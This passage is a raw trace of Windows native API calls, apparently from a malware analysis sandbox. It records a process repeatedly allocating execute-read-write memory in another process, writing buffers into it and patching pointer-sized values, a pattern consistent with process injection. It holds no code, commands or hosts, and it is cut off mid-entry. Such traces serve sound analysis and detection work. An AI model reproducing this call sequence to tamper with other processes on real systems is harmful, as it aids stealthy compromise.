[0140.336] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.337] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.337] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.337] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.337] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20015, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.337] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.337] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a3d0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.337] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x20, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.338] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x9499b0*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28df88 | out: Buffer=0x9499b0*, NumberOfBytesWritten=0x28df88*=0x8) returned 0x0 [0140.338] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.338] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.338] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.338] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.338] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.339] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.339] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.340] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.341] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.341] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.341] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20018, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.341] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.341] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a3d8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.341] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.341] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x9499a6*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x9499a6*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0140.341] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.341] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.342] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.342] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.342] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.342] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.342] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.342] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.342] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.342] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.342] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.343] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.343] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a3e0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.343] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.343] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x94999e*, NumberOfBytesToWrite=0x6, NumberOfBytesWritten=0x28df88 | out: Buffer=0x94999e*, NumberOfBytesWritten=0x28df88*=0x6) returned 0x0 [0140.343] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.343] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.343] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.343] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.344] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.344] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.344] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.344] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.344] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.344] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.344] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20016, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.344] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.344] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a3e8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.345] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.345] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949996*, NumberOfBytesToWrite=0x6, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949996*, NumberOfBytesWritten=0x28df88*=0x6) returned 0x0 [0140.345] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.345] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.345] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.345] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.345] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.345] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.345] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.346] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.346] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.346] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.346] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20016, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.346] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.346] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a3f0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.346] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.346] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949988*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949988*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0140.346] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.347] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.347] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.347] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.347] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.347] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.347] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.347] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.347] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.348] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.348] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.348] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.348] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a3f8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.348] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x26, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.348] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949978*, NumberOfBytesToWrite=0xe, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949978*, NumberOfBytesWritten=0x28df88*=0xe) returned 0x0 [0140.348] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.348] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.348] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.349] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.349] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.349] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.349] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.349] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.349] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.349] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.349] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001e, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.349] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.350] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a400, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.350] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.350] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x94996e*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x94996e*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0140.350] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.350] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.350] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.350] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.350] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.351] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.351] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.351] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.351] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.351] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.351] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.351] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.351] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a408, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.351] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x21, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.351] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949962*, NumberOfBytesToWrite=0x9, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949962*, NumberOfBytesWritten=0x28df88*=0x9) returned 0x0 [0140.352] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.352] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.352] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.352] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.352] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, 